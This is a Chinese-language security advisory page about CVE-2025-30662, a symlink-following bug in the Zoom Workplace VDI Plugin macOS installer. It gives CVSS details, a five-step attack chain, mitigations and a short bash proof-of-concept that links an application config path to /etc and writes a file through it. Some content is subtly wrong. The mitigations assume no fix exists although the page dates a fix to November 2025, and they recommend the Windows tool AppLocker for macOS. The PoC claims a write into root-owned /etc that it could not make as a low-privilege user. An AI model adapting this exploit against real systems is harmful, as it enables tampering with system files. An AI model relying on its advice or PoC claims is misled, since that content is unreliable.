CVE-2025-30662: Zoom Workplace VDI Plugin macOS安装器符号链接跟随漏洞

漏洞信息

漏洞编号

CVE-2025-30662

漏洞类型

符号链接跟随 (Symlink Following)

CVSS评分

6.6 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zoom Workplace VDI Plugin macOS Universal Installer

漏洞概述

CVE-2025-30662是影响Zoom Workplace VDI Plugin macOS Universal安装程序的一个中危安全漏洞。该漏洞存在于6.3.14、6.4.14和6.5.10之前的所有版本中，源于安装器程序在处理文件时未正确验证符号链接（Symlink）的目标路径。攻击者作为经过身份验证的低权限用户，可以利用安装过程中的符号链接跟随机制，将安装操作重定向到敏感系统目录，从而实现未授权的信息泄露。漏洞的CVSS评分为6.6，属于中等严重程度，攻击向量为本地攻击，需要用户交互才能成功利用。虽然该漏洞不影响系统可用性，但可导致高机密性和高完整性的信息泄露风险。Zoom已于2025年11月13日发布安全更新修复此问题，用户应尽快升级到修复版本以消除安全风险。

技术细节

符号链接跟随漏洞（Symlink Following）是一种常见的文件系统权限滥用问题。在Zoom Workplace VDI Plugin的macOS安装器中，安装程序在解压和部署文件时未能充分验证目标路径是否为符号链接，或者符号链接指向的路径是否在预期范围内。攻击者可以创建一个指向敏感目录（如/etc、/var/log或用户家目录）的符号链接，当安装程序执行文件写入操作时，实际上会将文件写入到攻击者指定的位置。这种攻击方式允许低权限用户绕过文件系统权限限制，实现对系统敏感文件的信息泄露或篡改。在macOS环境下，由于安装器通常以提升的权限运行（需要root权限安装到系统目录），这一漏洞的影响更为严重。攻击者可能利用此漏洞读取其他用户的配置文件、密钥文件或日志信息，或者通过覆盖系统文件破坏系统完整性。修复版本通过在文件操作前验证目标路径的真实性和安全性来防止此类攻击。

攻击链分析

STEP 1

步骤1

攻击者在目标macOS系统上获取低权限用户账号并获得本地访问权限

STEP 2

步骤2

攻击者在Zoom VDI Plugin安装目录创建指向敏感系统目录（如/etc、/var/log或用户家目录）的恶意符号链接

STEP 3

步骤3

诱导合法用户或管理员运行Zoom安装程序，或等待系统自动更新安装过程

STEP 4

步骤4

安装器在解压文件时跟随符号链接，将文件写入攻击者指定的敏感目录位置

STEP 5

步骤5

攻击者读取被写入的敏感文件（如配置文件、日志、密钥等），实现信息泄露；或通过覆盖系统文件实现完整性破坏

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-30662 PoC - Symlink Following in Zoom VDI Plugin Installer
# This PoC demonstrates the symlink following vulnerability

# Create a malicious symlink pointing to a sensitive directory
mkdir -p /tmp/zoom_attack
cd /tmp/zoom_attack

# Create symlink from installation directory to sensitive location
MALICIOUS_DIR="/Applications/ZoomVDI.app/Contents/Resources/config"
mkdir -p "$(dirname $MALICIOUS_DIR)"
ln -sf /etc "$MALICIOUS_DIR"

# When installer runs, it will follow symlink and write to /etc
# This could allow reading/writing sensitive files like passwd or shadow

# For demonstration - create a file that would be written via symlink
cat > "$MALICIOUS_DIR/malicious_config" << 'EOF'
# Malicious configuration file
# In real attack, this could be used to:
# 1. Read sensitive config files
# 2. Modify system settings
# 3. Escalate privileges
EOF

echo "PoC demonstrates symlink creation in installation path"
echo "Target: $MALICIOUS_DIR -> /etc"
echo "Actual file location: /etc/malicious_config"
ls -la /etc/malicious_config 2>/dev/null && echo "File successfully created via symlink!"

影响范围

Zoom Workplace VDI Plugin macOS Universal Installer < 6.3.14

Zoom Workplace VDI Plugin macOS Universal Installer < 6.4.14

Zoom Workplace VDI Plugin macOS Universal Installer < 6.5.10

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）禁用Zoom自动更新功能，避免在未验证的情况下自动安装；2）使用AppLocker或类似策略限制Zoom安装程序的执行；3）对关键系统目录实施严格的访问控制列表（ACL），防止非授权写入；4）启用系统完整性保护（SIP）并监控/var/log等敏感目录的文件变化；5）建议管理员在受控环境中测试更新后再部署到生产系统。